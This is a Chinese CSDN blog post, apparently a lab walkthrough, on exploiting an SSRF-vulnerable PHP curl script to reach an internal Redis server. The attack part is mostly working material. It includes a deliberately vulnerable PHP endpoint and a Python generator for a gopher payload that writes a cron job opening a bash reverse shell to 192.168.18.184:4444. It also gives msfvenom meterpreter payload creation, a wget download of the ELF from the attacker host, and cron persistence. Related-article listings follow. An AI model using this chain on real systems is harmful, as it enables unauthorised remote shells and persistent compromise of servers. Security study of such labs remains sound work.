Redis和SSRF不同主机,进行入侵提取

最新推荐文章于 2024-10-04 13:19:28 发布
最新推荐文章于 2024-10-04 13:19:28 发布
阅读量59 收藏
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kiihuang/article/details/130046270
版权
  • 创建两个主机
    • 一个开启redis远程访问,但没有web,同时设置只允许另一个ip访问 192.168.18.189 
      设置规则

iptables -I INPUT -s 192.168.18.171 -p tcp --dport 6379 -j ACCEPT  #允许指定ip访问6379端口
iptables -A INPUT -s  0.0.0.0/0 -p tcp --dport 6379 -j DROP    #拒绝所有6379访问

      • 一个进行远程连接,开启web 192.168.18.171
    • 192.168.18.171,创建以下代码,进行ssrf漏洞 
      <?php
$url=$_POST['url'];
//创建一个curl资源
$ch=curl_init();
//设置url和相应的选项
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_HEADER,1);
//抓取url并把它传递给浏览器
curl_exec($ch);
//关闭curl资源,并释放系统资源
curl_close($ch);
?>

    • 进行测试,看能否访问指定端口

     

  • 抓包进行用户名密码爆破

 

  • 爆破成功,获取密码

 

  • 进行构造payload 
    import urllib.parse

passwd = '123456'
set = 'set 1'
sh ="\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.18.184/4444 0>&1\n\n"   #可以直接使用不需要转义
sh = sh.replace(' ',"####")  #替换空格
shell =f'{set} {sh}'
# print(shell)
dir = 'config set dir /var/spool/cron/'
name = 'config set dbfilename root'

payloads = [f'auth {passwd}','flushdb',f'{shell}',f'{dir}',f'{name}','save']  #填充内容
payload = ''
for pay in payloads:
    pa = pay.split(" ")    #遍历,以空格作为分隔符
    # print(p)
    payload = payload + '*' + str(len(pa)) + r'\r\n'   #构造payload原始语句
    for p in pa:
        payload = payload + "$" + str(len(p.replace('####',' '))) + r'\r\n' + p.replace('####',' ') + r'\r\n'   #构造payload原始语句
print(payload)
url = urllib.parse.quote(payload).replace('%','%25').replace('5Cr','0D').replace('5Cn','0A')  #将构造好语句转换为url编码,同时为了满足gopher将%转换为%25,转换过程有错误,/r/n,url编码错误,进行手动替换
print(url)

  • 构造完成进行,gopher输入

 

  • 反弹成功

 

  • 该模式下有一部分命令无法使用 
    [root@localhost ~]# env    #查看环境变量
env
XDG_SESSION_ID=42
SHELL=/bin/bash
USER=root
PATH=/usr/bin:/bin:usr/sbin   #重要
PWD=/root
LANG=zh_CN.UTF-8
HOME=/root
SHLVL=2
LOGNAME=root
LESSOPEN=||/usr/bin/lesspipe.sh %s
XDG_RUNTIME_DIR=/run/user/0
_=/usr/bin/env

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin  #使用export添加变量

成功,可以使用命令

  • 进行拓展 
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.18.184 LPORT=4444 -f elf > tmp/shell.elf  #制作反弹shell木马
python -m http.server 80   #在当前目录开启http服务
wget http://192.168.18.184:80/shell.elf
 #靶机下载
use exploit/multi/handler  #进入msf选择指定文件
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.18.184
set lport 4444   #设置监听
echo "/n/n* * * * * ./root/shell.elf" >> /var/spool/cron/root  #写入定时任务
chmod a+x shell.elf  #给予执行权限

gg_Go_game
关注
【安全】P 7-3 SSRF利用-内网资源访问
Z_David_Z的博客
02-28 320
目录0X01 SSRF漏洞代码分析0X02 实验环境搭建0X03 利用SSRF进行内网资源访问0X04 利用SSRF进行端口扫描 0X01 SSRF漏洞代码分析 一下代码存在SSRF漏洞,分析 <?php if (isset($_GET['url'])) { $link = $_GET['url']; $curlobj = curl_init($link); curl_setopt($curlobj, CURLOPT_HEADER, 0); curl_setopt($curlobj, CURLOPT_
浅谈大型互联网的企业入侵检测及防护策略
2401_84215240的博客
09-29 1201
如何知道自己所在的企业是否被入侵了?是没人来“黑”,还是因自身感知能力不足,暂时还无法发现?其实,入侵检测是每一个大型互联网企业都要面对的严峻挑战。价值越高的公司,面临入侵的威胁也越大,即便是Yahoo这样的互联网鼻祖,在落幕(被收购)时仍遭遇全量数据失窃的事情。安全无小事,一旦互联网公司被成功“入侵”,其后果将不堪想象。基于“攻防对抗”的考量,本文不会提及具体的入侵检测模型、算法和策略,那些希望直接照搬“入侵策略”的同学可能会感到失望。
护网面试内容
2302_78903258的博客
06-26 984
分析请求、响应内容,判断是否攻击成功首先看告警事件名称判断是网络攻击事件还是web攻击事件,网络攻击事件:定位五元组信息(源IP、目的IP、源端口、目的端口、协议),对整个僵、木、蠕传播链进行分析,以攻击IP作为受害IP进行检索查找攻击源。WEB攻击事件:通过数据包的请求体、响应体、状态码等。
护网面试基础题(简洁版)
qq_51690690的博客
09-04 1572
护网面试基础试题,蓝队都得会的题
【八股】2024春招八股复习笔记3(测试、运维、安全、游戏、客户端)
小哈里的博客
03-27 3964
1、测试开发 2、运维开发 SRE 3、安全开发 4、运营开发/应用开发(全栈) 5、客户端:PC & 移动 & 游戏 我有一个问题,既然测试、运维、安全、运营、客户端都要会开发,同时还要会很多专业领域的知识,但是待遇和职业发展却都远远不如开发。那为什么不直接投业务开发呢(好吧可能是太卷了) 1、测试开发 1、网络 & 系统(含linux) 2、数据库,MySQL,JAVA 3、测试流程:单元测试、集成测试、系统测试 【八股】2024春招八股复习笔记3(测试、运维、安全、游戏、客户端)
路径,端口,工具总结专题
goddemon
01-20 3530
常见端口总结 一,远程管理端口 22 端口(SSH) #安全攻击:弱口令、暴力猜解、用户名枚举利用方式:1、通过用户名枚举可以判断某个用户名是否存在于目标主机,2、利用弱口令/暴力破解,获取目标主机权限。 23 端口(Telnet) #安全漏洞:弱口令、明文传输利用方式:1、通过弱口令或暴力破解,获取目标主机权限。2、嗅探抓取telnet明文账户密码。 3389 端口(RDP) #安全漏洞:暴力破解利用方式:通过弱口令或暴力破解,获取目标主机权限。 5632 端口(Pcanywhere) #安全漏洞:弱口
艾体宝干货 | 教程:使用ntopng和nProbe监控网络流量
2401_84466316的博客
06-19 1086
Ntopng 是原始 ntop 的下一代版本,它是一款用于监控网络使用情况的网络流量探测器。能从镜像流量、NetFlow 导出器、SNMP 设备、防火墙日志和入侵检测系统收集流量信息,从而提供 360° 网络可视性。ntopng 有三个版本:社区版、专业版(小型企业版)和企业版。社区版免费使用,并且开源。服务器的物理网卡可通过指定其接口名称进行监控,如./ntopng -i eth0不过,我们将在流量收集模式下使用 ntopng 和 nProbe,后者可以充当探针/代理。
渗透测试 ( 1 ) --- 相关术语、必备 工具、导航、全流程总结、入侵网站思路
freeking101的博客
07-02 2万+
在学习某项技能的时,要用最快的时间摸索清楚最少必要知识 (MAKE)都有哪些? 然后迅速地掌握它们,这样就实现了 "快速入门",然后就可以开始动手实践,然后在实践验证理论、加深理解,同时继续扩展学习。而学习黑客也是同样的道理,对于新手小白的第一课应该是以掌握基础的安全工具为主,这样在学习的同时可以进行实践,验证所学的知识,同时加以扩展,这样学习效率会大大提升.........................................................
网络安全面试分享:HVV行动题目及答案(非常详细)零基础入门到精通,收藏这一篇就够了
2402_84205067的博客
08-01 1074
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
实训周笔记
weixin_67348669的博客
03-22 6103
主机信息收集技术—基础知识: 主要收集目标主机的相关信息,主要包括端口、服务、漏洞等信息。信息收集手段多样,可借助工具也多种多样。 端口扫描:Nmap 主机信息收集技术—Nmap: namp 192.168.1.1 namp -A –T4 -v 192.168.1.1 -A 开启操作系统识别和版本识别功能 -T 0-6档,设置扫描的快慢,0最慢,6最快; 级别越高,对网络带宽要求越高,另外扫描太快,容易被安全设备发现; 一般选择T4 -v 显示信息的级别,...
网络安全专业名词解释
aixmmmlll的博客
05-16 3926
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景。作动词解释时理解为恶意软件与攻击者进行交互
网络逻辑漏洞、SQLMAP、Nmap、burpsuite及其命令的使用方法
weixin_65695770的博客
04-07 4229
SQLMAP sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 sqlmap支持五种不同的注入模
史上最全网络安全面试题总结
热门推荐
03-17 2万+
新的一年,难免有不少小伙伴面临跳槽或者找工作,本文总结了常见的安全岗位面试题,方便各位复习。祝各位事业顺利,财运亨通。 php爆绝对路径方法? 单引号引起数据库报错 访问错误参数或错误路径 探针类文件如phpinfo 扫描开发未删除的测试文件 google hacking phpmyadmin报路径:/phpmyadmin/libraries/lect_lang.lib.php 利用漏洞读取配置文件找路径 恶意使用网站功能,如本地图片读取功能读取不存在图片,上传点上传不能正常导入的文件 你常用的渗
Linux 再入门整理:详解 /etc/fstab 文件
一只奋斗的猪
10-01 1175
`/etc/fstab` 文件是 Linux 系统用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统一种将存储设备与目录树关联的操作。通过挂载,存储设备的文件可以通过目录访问。
组播基础-1
DC_BLOG的博客
09-27 883
信息的发送者为:组播源 接受相同信息的接收者构成一个组播组,并且每个接收者都是组播组成员 提供组播功能的路由器成为:组播组路由器 组播路由器不仅提供组播路由功能,也提供组成员管理功能,也可以是组播组成员
毕业设计——springboot+netty+websocket实现一个简单的ChatGpt机器人聊天
【CSDN】
09-29 777
WebSocket是html5开始浏览器和服务端进行全双工通信的网络技术。在该协议下,与服务端只需要一次握手,之后建立一条快速通道,开始互相传输数据,实际是基于TCP双向全双工,比http半双工提高了很大的性能,常用于网络在线聊天室等。申请key的教程在项目resources目录readme.md文件。1、接入了chatGpt接口,只需要替换成自己的key就行。2、实现了与机器人的聊天,可以优化做成智能客服。
项目管理-信息技术发展
最新发布
GAVIN
10-04 344
对称加密:DES 3DES AES RC5 IEDA SM1 SM4。2)分类:PAN LAN MAN WAN 公用网 专用网。4)数据结构模型 层次模型 网状模型 关系模型。1)存储 分类:DAS FAS NAS SAN。物联网(IoT) 感知层 网络层 应用层。8) 5G 高速率 低时延 大连接。设备安全 数据安全 内容安全 行为安全。4.信息安全 保密性 完整性 可用性。3)网络协议 语法 语义 时许。5)IEEE 802 规范。6)TCP/IP 协议。4)网络标准协议 7层。
使用socket编程来实现一个简单的C/S模型(TCP协议)
caiji0169的博客
10-02 1686
下图是基于TCP协议的客户端/服务器程序的一般流程:服务器调用socket()、bind()、listen()完成初始化后,调用accept()阻塞等待,处于监听端口的状态,客户端调用socket()初始化后,调用connect()发出SYN段并阻塞等待服务器应答,服务器应答一个SYN-ACK段,客户端收到后从connect()返回,同时应答一个ACK段,服务器收到后从accept()返回。数据传输的过程:建立连接后,TCP协议提供全双工的通信服务,但是一般的客户端/服务器程序的流程是由客户端主动发起请求,
SSRF+Redis组合拳使用协议进行payload传递
07-14
SSRF(Server-Side Request Forgery)是一种安全漏洞...值得一提的是,利用SSRF和Redis组合进行攻击是一种高级技术,需要深入了解和理解相关安全原理和技术。在实际应用,请务必遵守法律法规,避免进行非法攻击行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值